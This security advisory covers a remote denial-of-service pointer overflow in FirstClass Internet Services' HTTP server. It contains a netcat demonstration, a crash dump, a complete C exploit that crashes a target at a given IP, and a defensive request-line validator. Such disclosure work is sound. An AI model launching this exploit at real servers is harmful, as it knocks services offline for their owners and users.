FirstClass is "a combination of solutions that allows a company to set up a reliable intranet by integrating powerful internet services and including most common communication protocols (SMTP/ HTTP/ FTP/ ...)".
A vulnerability in the product allows remote attackers to cause the HTTP server to crash by sending it a malformed HTTP request.
Credit:
The information has been provided by Aurélien BOUDOUX and Fred CHAVEROT.
Vulnerable systems:
* FirstClass build 133 (SP3) and prior
FirstClass's "Internet Services" plug-in has a remote DoS vulnerability in the HTTP daemon, caused by a heap overflow that overwrites a data pointer.
By sending a request on port 80 of the form GET / HTTP/1.1[A x 246], i.e. a valid request line followed by 246 filler bytes with no separating CRLF,
FirstClass Internet Services triggers an access violation: it tries to read, through the overwritten pointer, data that lies outside the address space allocated to the process.
Vendor status:
CENTRINITY Corp. has been told about this problem and is currently working on a fix.
Example:
D:\netcat>nc -vv 10.0.0.5 80
I2S-w2k [10.0.0.5] 80 (http) open
GET / HTTP/1.1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADDDD
sent 262, rcvd 0: NOTSOCK
D:\netcat>
*** Exception in program C:\FCServer\fcintsrv.exe
Location: CList::GetNext+0000003C (004F882C)
Error: Access violation
Cause: Read attempted at <Unknown> (4444444C)
Registers:
EAX=01F2415C EBX=00C802F0 ECX=44444444 <-- pointer is overwritten here
EDX=01F2415C ESI=00000000 EDI=00000000
EIP=004F882C ESP=0205F86C EBP=0205F870 Flags=00000206
CS=0000001B DS=00000023 SS=00000023
ES=00000023 FS=00000038 GS=00000000
:004F881D 8B55FC mov edx, dword ptr [ebp-04]
:004F8820 837A0400 cmp dword ptr [edx+04], 00000000
:004F8824 740B je 004F8831
:004F8826 8B45FC mov eax, dword ptr [ebp-04]
:004F8829 8B4804 mov ecx, dword ptr [eax+04]
:004F882C 8B4108 mov eax, dword ptr [ecx+08] <-- crash occurs
:004F882F EB02 jmp 004F8833
Exploit:
/*******************************************
* FirstClass Internet Services Remote DoS *
*******************************************
discovered & coded by I2S-LAB
--------------------------------------------
This exploit uses a ptr overflow to remotely
shutdown the Internet Services of FirstClass.
CONTACT
_______
Fred CHAVEROT : fred[at]I2S-LAB.com
Aurélien BOUDOUX : aurelien[at]I2S-LAB.com
URL : http://www.I2S-LaB.com
*******************************************/
#include <stdio.h>
#include <windows.h>
#include <winsock.h>
#pragma comment (lib,"wsock32.lib")

/* Number of filler bytes after the request line; 246 is the length
   the authors found reaches the list pointer (see the crash dump above). */
#define PerfectOverwrite 246

int main (int argc, char *argv[])
{
    SOCKET sock1;
    SOCKADDR_IN sin;
    char *sav;
    WSADATA wsadata;
    WORD wVersionRequested = MAKEWORD (2,0);

    printf ("- FirstClass Internet Services Remote DoS -\n\n"
            "Discovered & coded by I2S-LAB\n"
            "http://www.I2S-LaB.com\n\n");
    if (argc < 2)
    {
        printf ("Usage : %s <IP Address>\n", argv[0]);
        ExitProcess (0);
    }
    if (WSAStartup(wVersionRequested, &wsadata) ) ExitProcess (0);

    /* LPTR returns zeroed memory, so the buffer starts as an empty string. */
    if (!(sav = (char *) LocalAlloc (LPTR, 20 + PerfectOverwrite)) )
    {
        printf ("Error ! cannot allocate enough memory.\n");
        ExitProcess (0);
    }

    /* Build "GET / HTTP/1.1" + 242 x 'A' + "DDDD" + CRLF CRLF (264 bytes). */
    lstrcat (sav, "GET / HTTP/1.1");
    memset (&sav[14], 'A', PerfectOverwrite - 4);
    lstrcat (sav,"DDDD\r\n\r\n");

    sin.sin_family = AF_INET;
    sin.sin_port = htons (80);
    if ( (sin.sin_addr.s_addr=inet_addr (argv[1])) == INADDR_NONE)
    {
        printf ("Incorrect IP Address : %s\n", argv[1]);
        ExitProcess(0);
    }
    sock1 = socket (AF_INET, SOCK_STREAM, 0);
    printf ("\nconnecting to %s...", argv[1]);
    if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) == SOCKET_ERROR )
        printf ("connection failed!\n");
    else
    {
        printf ("ok!\nSending crafted request...");
        send (sock1,sav, PerfectOverwrite + 18,0);
        puts ("ok!");
    }
    closesocket (sock1);
    LocalFree (sav);
    return 0;
}
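The request that triggers the crash is a well-formed request line with arbitrary bytes glued onto the version token and no CRLF until the very end. As an added example (not the advisory's code nor the vendor's), here is a bounded request-line validator in C that rejects that shape before anything is copied into a fixed-size buffer; MAX_REQUEST_LINE and the helper names are assumptions chosen for this example.

```c
#include <ctype.h>
#include <string.h>

/* Hypothetical cap on request-line length, chosen for this example. */
#define MAX_REQUEST_LINE 4096

enum rl_status { RL_OK = 0, RL_NO_CRLF, RL_BAD_METHOD, RL_BAD_TARGET, RL_BAD_VERSION };

/* Validate bytes [buf, buf+len) as an HTTP/1.x request line ("METHOD SP target
 * SP HTTP/d.d CRLF"). Every scan is bounded by len and MAX_REQUEST_LINE, so
 * over-long or unterminated input is refused instead of being copied. */
enum rl_status validate_request_line(const char *buf, size_t len)
{
    size_t i = 0, start, line_len;
    size_t limit = len < MAX_REQUEST_LINE + 2 ? len : MAX_REQUEST_LINE + 2;
    /* CRLF must appear within the limit; otherwise refuse the line. */
    while (i + 1 < limit && !(buf[i] == '\r' && buf[i + 1] == '\n'))
        i++;
    if (i + 1 >= limit)
        return RL_NO_CRLF;
    line_len = i;
    /* Method: 1..16 upper-case letters, then exactly one space. */
    for (i = 0; i < line_len && isupper((unsigned char)buf[i]); i++) ;
    if (i == 0 || i > 16 || i >= line_len || buf[i] != ' ')
        return RL_BAD_METHOD;
    start = ++i;
    /* Request-target: non-empty printable bytes without spaces, then one space. */
    for (; i < line_len && buf[i] > ' ' && buf[i] < 0x7f; i++) ;
    if (i == start || i >= line_len || buf[i] != ' ')
        return RL_BAD_TARGET;
    i++;
    /* Version must be exactly "HTTP/d.d" and must end the line: the trailing
     * filler in the advisory's request fails here. */
    if (line_len - i != 8 || memcmp(buf + i, "HTTP/", 5) != 0 ||
        !isdigit((unsigned char)buf[i + 5]) || buf[i + 6] != '.' ||
        !isdigit((unsigned char)buf[i + 7]))
        return RL_BAD_VERSION;
    return RL_OK;
}

/* Constructed request with the shape quoted in the advisory: a valid prefix,
 * 246 filler bytes, then CRLF CRLF. Returns the validator's verdict. */
enum rl_status check_advisory_shape(void)
{
    char req[264];
    memcpy(req, "GET / HTTP/1.1", 14);
    memset(req + 14, 'A', 242);
    memcpy(req + 256, "DDDD\r\n\r\n", 8);
    return validate_request_line(req, sizeof req);
}
```

A server that parses this way returns a 400 for the advisory's request instead of walking a corrupted list node.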